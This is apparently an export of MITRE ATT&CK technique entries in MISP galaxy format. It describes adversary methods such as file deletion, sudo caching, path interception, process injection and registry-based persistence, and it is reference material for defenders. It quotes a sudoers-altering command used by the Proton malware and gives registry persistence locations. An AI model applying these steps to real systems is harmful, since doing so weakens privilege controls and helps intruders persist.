Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1107"

File Deletion - T1107 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
Redundant Access - T1108

This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated.

If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary’s tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.

Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.

The tag is: `misp-galaxy:mitre-attack-pattern="Redundant Access - T1108"

Table 3657. Table References

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Component Firmware - T1109

Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: `misp-galaxy:mitre-attack-pattern="Component Firmware - T1109"

Component Firmware - T1109 has relationships with:
System Firmware - T1019

The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

System firmware like BIOS and (UEFI) underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: *misp-galaxy:mitre-attack-pattern*="System Firmware - T1019"

System Firmware - T1019 has relationships with:

- revoked-by: *misp-galaxy:mitre-attack-pattern*="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"
**Data Encrypted - T1022**

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.

Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)

The tag is: *misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022"

Data Encrypted - T1022 has relationships with:

- revoked-by: *misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560"* with estimative-language:likelihood-probability="almost-certain"

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**Data Hiding - T1320**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).

Certain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)

The tag is: *misp-galaxy:mitre-attack-pattern="Data Hiding - T1320"

*Table 3661. Table References*

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<td><a href="https://attack.mitre.org/techniques/T1320">https://attack.mitre.org/techniques/T1320</a></td>
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Shortcut Modification - T1023

Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023"

Shortcut Modification - T1023 has relationships with:


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Broadcast Receivers - T1402

An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.

Further, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.

In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

The tag is: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"

Table 3663. Table References

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**User Execution - T1204**

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

The tag is: `misp-galaxy:mitre-attack-pattern="User Execution - T1204"

**Table 3664. Table References**

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**Task requirements - T1240**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1240).

Once divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)

The tag is: `misp-galaxy:mitre-attack-pattern="Task requirements - T1240"

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**Traffic Signaling - T1205**

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. (Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement. (Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)

The tag is: `misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205"

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**Multiband Communication - T1026**

This technique has been deprecated and should no longer be used.

Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass
certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.

The tag is: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026"

Table 3667. Table References

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**Sudo Caching - T1206**

The `<code>sudo</code>` command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a `<code>timestamp_timeout</code>` that is the amount of time in minutes between instances of `<code>sudo</code>` before it will re-prompt for a password. This is because `<code>sudo</code>` has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at `<code>/var/db/sudo</code>` with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a `<code>tty_tickets</code>` variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

Adversaries can abuse poor configurations of this to escalate privileges without needing the user’s password. `<code>/var/db/sudo</code>`’s timestamp can be monitored to see if it falls within the `<code>timestamp_timeout</code>` range. If it does, then malware can execute sudo commands without needing to supply the user’s password. When `<code>tty_tickets</code>` is disabled, adversaries can do this from any tty for that user.

The OSX Proton Malware has disabled `<code>tty_tickets</code>` to potentially make scripting easier by issuing `<code>echo \'\`Defaults !tty_tickets\`\' &gt; /etc/sudoers</code>` (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue `<code>killall Terminal</code>`. As of macOS Sierra, the sudoers file has `<code>tty_tickets</code>` enabled by default.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206"

Sudo Caching - T1206 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 3668. Table References

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Time Providers - T1209

The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders</code>. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Time Providers - T1209"</code>

Time Providers - T1209 has relationships with:


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Scheduled Transfer - T1029

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: `misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029"

### Shadow DNS - T1340

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).

The process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)

The tag is: `misp-galaxy:mitre-attack-pattern="Shadow DNS - T1340"

### Path Interception - T1034

This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).

Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)

There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if
intercepted executables are started by a higher privileged process.

**Unquoted Paths**

Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., `<code>C:\unsafe path with space\program.exe</code>` vs. `<code>"C:\safe path with space\program.exe"</code>`). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is `<code>C:\program files\myapp.exe</code>`, an adversary may create a program at `<code>C:\program.exe</code>` that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)

**PATH Environment Variable Misconfiguration**

The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, `<code>%SystemRoot%\system32</code>` (e.g., `<code>C:\Windows\system32</code>`), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.

For example, if `<code>C:\example path</code>` precedes `<code>C:\Windows\system32</code>` is in the PATH environment variable, a program that is named net.exe and placed in `<code>C:\example path</code>` will be called instead of the Windows system "net" when "net" is executed from the command-line.

**Search Order Hijacking**

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument `<code>net user</code>`. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then `<code>cmd.exe /C net user</code>` will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

The tag is: `misp-galaxy:mitre-attack-pattern="Path Interception - T1034"

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### Location Tracking - T1430

An adversary could use a malicious or exploited application to surreptitiously track the device's physical location through use of standard operating system APIs.

The tag is: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"

### Table 3673. Table References

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### Service Execution - T1035

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.

The tag is: `misp-galaxy:mitre-attack-pattern="Service Execution - T1035"`
Service Execution - T1035 has relationships with:


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Anonymity services - T1306

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1306).

Anonymity services reduce the amount of information available that can be used to track an adversary's activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. (Citation: TOR Design) (Citation: Stratfor2012)

The tag is: *misp-galaxy:mitre-attack-pattern="Anonymity services - T1306***"

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Process Hollowing - T1093

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)

The tag is: *misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093***"

Process Hollowing - T1093 has relationships with:


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Obfuscate infrastructure - T1309

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)

The tag is: `misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309"

Obfuscate infrastructure - T1309 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331" with estimative-language:likelihood-probability="almost-certain"

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Indicator Blocking - T1054

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

The tag is: `misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054"

Indicator Blocking - T1054 has relationships with:
Code Injection - T1540

Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.

With root access, `ptrace` can be used to target specific applications and load shared libraries into its process memory. (Citation: Shunix Code Injection Mar 2016) (Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process. (Citation: Google Triada June 2019)

The tag is: `misp-galaxy:mitre-attack-pattern="Code Injection - T1540"`

PowerShell Profile - T1504

Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure
a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: <code>misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504"</code>

PowerShell Profile - T1504 has relationships with:


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**Software Packing - T1045**

Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Software Packing - T1045"</code>
Software Packing - T1045 has relationships with:


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**Biometric Spoofing - T1460**

An adversary could attempt to spoof a mobile device’s biometric authentication mechanism, for example by providing a fake fingerprint as described by SRLabs in (Citation: SRLabs-Fingerprint).

iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Biometric Spoofing - T1460"

Biometric Spoofing - T1460 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

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**Data Staged - T1074**

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Data Staged - T1074"

Table 3683. Table References

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**Execution Guardrails - T1480**

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480"

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**Process Injection - T1055**

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via
process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

The tag is: `misp-galaxy:mitre-attack-pattern="Process Injection - T1055"`

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<td><a href="https://docs.microsoft.com/sysinternals/downloads/sysmon">https://docs.microsoft.com/sysinternals/downloads/sysmon</a></td>
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**Input Capture - T1056**

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).

The tag is: `misp-galaxy:mitre-attack-pattern="Input Capture - T1056"`

**Table 3686. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1056">https://attack.mitre.org/techniques/T1056</a></td>
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Process Discovery - T1057

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `<code>Get-Process</code>` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `<code>CreateToolhelp32Snapshot</code>`. In Mac and Linux, this is accomplished with the `<code>ps</code>` command. Adversaries may also opt to enumerate processes via `/proc`.

The tag is: *misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"

Table 3687. Table References

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Stage Capabilities - T1608

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin. (Citation: Volexity Ocean Lotus November 2020)

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

- Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site. (Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
- Staging web resources for a link target to be used with spearphishing. (Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
- Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105). (Citation: Volexity Ocean Lotus November 2020)
• Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)). ( Citation: DigiCert Install SSL Cert)

The tag is: `misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608"

### Account Discovery - T1087

Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.

The tag is: `misp-galaxy:mitre-attack-pattern="Account Discovery - T1087"

### Valid Accounts - T1078

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even
be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)

The tag is: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"

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**Multilayer Encryption - T1079**

An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.

The tag is: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079"

Multilayer Encryption - T1079 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

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Account Manipulation - T1098

Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.

The tag is: *misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098"

Table 3692. Table References

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Modify Registry - T1112

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft RegHide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.

The tag is: *misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"
Authentication Package - T1131

Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

